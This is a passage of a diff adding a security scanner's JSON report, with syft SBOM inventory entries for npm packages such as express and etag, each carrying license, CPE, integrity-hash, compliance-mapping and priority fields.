"Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b31fcb4e8c7ac0d8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: etag 1.8.1", + "title": "etag 1.8.1", + "description": "Package discovered: etag 1.8.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4ddb33d9fc7b6ece", + "name": "etag", + "version": "1.8.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:etag:etag:1.8.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/etag@1.8.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz", + "integrity": "sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "643445c96492a454", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: event-target-shim 5.0.1", + "title": "event-target-shim 5.0.1", + "description": "Package discovered: event-target-shim 5.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "419bcd6d1f4e7103", + "name": "event-target-shim", + "version": "5.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:event-target-shim:event-target-shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event-target-shim:event_target_shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event_target_shim:event-target-shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event_target_shim:event_target_shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event-target:event-target-shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event-target:event_target_shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event_target:event-target-shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event_target:event_target_shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event:event-target-shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:event:event_target_shim:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/event-target-shim@5.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz", + "integrity": "sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "df7be298e5b5835f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: eventemitter3 4.0.7", + "title": "eventemitter3 4.0.7", + "description": "Package discovered: eventemitter3 4.0.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2bf11b6ac833063c", + "name": "eventemitter3", + "version": "4.0.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:eventemitter3:eventemitter3:4.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/eventemitter3@4.0.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz", + "integrity": "sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8f3c29afa2938d65", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: events 3.3.0", + "title": "events 3.3.0", + "description": "Package discovered: events 3.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bca3d6fcf9ecc55d", + "name": "events", + "version": "3.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:events:events:3.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/events@3.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/events/-/events-3.3.0.tgz", + "integrity": "sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "42a06b319afe7e6e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: express 4.22.1", + "title": "express 4.22.1", + "description": "Package discovered: express 4.22.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7bcabe4027921ced", + "name": "express", + "version": "4.22.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:openjsf:express:4.22.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/express@4.22.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/express/-/express-4.22.1.tgz", + "integrity": "sha512-F2X8g9P1X7uCPZMA3MVf9wcTqlyNp7IhH5qPCI0izhaOIYXaW9L535tGA3qmjRzpH+bZczqq7hVKxTR4NWnu+g==", + "dependencies": { + "accepts": "~1.3.8", + "array-flatten": "1.1.1", + "body-parser": "~1.20.3", + "content-disposition": "~0.5.4", + "content-type": "~1.0.4", + "cookie": "~0.7.1", + "cookie-signature": "~1.0.6", + "debug": "2.6.9", + "depd": "2.0.0", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "finalhandler": "~1.3.1", + "fresh": "~0.5.2", + "http-errors": "~2.0.0", + "merge-descriptors": "1.0.3", + "methods": "~1.1.2", + "on-finished": "~2.4.1", + "parseurl": "~1.3.3", + "path-to-regexp": "~0.1.12", + "proxy-addr": "~2.0.7", + "qs": "~6.14.0", + "range-parser": "~1.2.1", + "safe-buffer": "5.2.1", + "send": "~0.19.0", + "serve-static": "~1.16.2", + "setprototypeof": "1.2.0", + "statuses": "~2.0.1", + "type-is": "~1.6.18", + "utils-merge": "1.0.1", + "vary": "~1.1.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ba97090edfd08e19", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: express-rate-limit 8.5.1", + "title": "express-rate-limit 8.5.1", + "description": "Package discovered: express-rate-limit 8.5.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "41f99f3613a4245b", + "name": "express-rate-limit", + "version": "8.5.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:express-rate-limit:express-rate-limit:8.5.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/express-rate-limit@8.5.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.5.1.tgz", + "integrity": "sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ==", + "dependencies": { + "ip-address": "^10.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f780fc7a8f12c92d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: extend 3.0.2", + "title": "extend 3.0.2", + "description": "Package discovered: extend 3.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c7f94791a09e5a4e", + "name": "extend", + "version": "3.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:extend_project:extend:3.0.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/extend@3.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", + "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9507c5e5a8d55fc3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: farmhash-modern 1.1.0", + "title": "farmhash-modern 1.1.0", + "description": "Package discovered: farmhash-modern 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2efb607597053214", + "name": "farmhash-modern", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:farmhash-modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:farmhash-modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:farmhash_modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:farmhash_modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:farmhash:farmhash-modern:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:farmhash:farmhash_modern:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/farmhash-modern@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/farmhash-modern/-/farmhash-modern-1.1.0.tgz", + "integrity": "sha512-6ypT4XfgqJk/F3Yuv4SX26I3doUjt0GTG4a+JgWxXQpxXzTBq8fPUeGHfcYMMDPHJHm3yPOSjaeBwBGAHWXCdA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7b51b4692c5fdf0a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fast-deep-equal 2.0.1", + "title": "fast-deep-equal 2.0.1", + "description": "Package discovered: fast-deep-equal 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "18c3431d6798a7cd", + "name": "fast-deep-equal", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fast-deep-equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-deep-equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep_equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast_deep_equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fast-deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", + "source": 